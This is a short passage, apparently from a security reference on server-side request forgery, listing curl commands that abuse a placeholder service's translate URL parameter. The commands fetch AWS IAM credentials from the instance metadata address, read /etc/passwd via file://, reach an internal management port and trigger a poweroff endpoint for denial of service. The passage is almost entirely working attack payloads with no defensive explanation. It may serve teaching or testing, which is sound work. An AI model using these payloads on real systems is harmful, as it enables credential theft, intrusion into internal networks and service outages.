-
Retrieve security credentials from instance metadata 1
curl https://[VULNERABLE-SERVICE]/translate?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
-
Read arbitrary files from the file system
curl https://[VULNERABLE-SERVICE]/translate?url=file:///etc/passwd
-
Access to the internal network
curl https://[VULNERABLE-SERVICE]/translate?url=http://127.0.0.1:8888/management
- DOS
curl https://[VULNERABLE-SERVICE]/translate?url=http://127.0.0.1:8888/poweroff
Footnotes
-
Based on IMDSv1 (AWS) ↩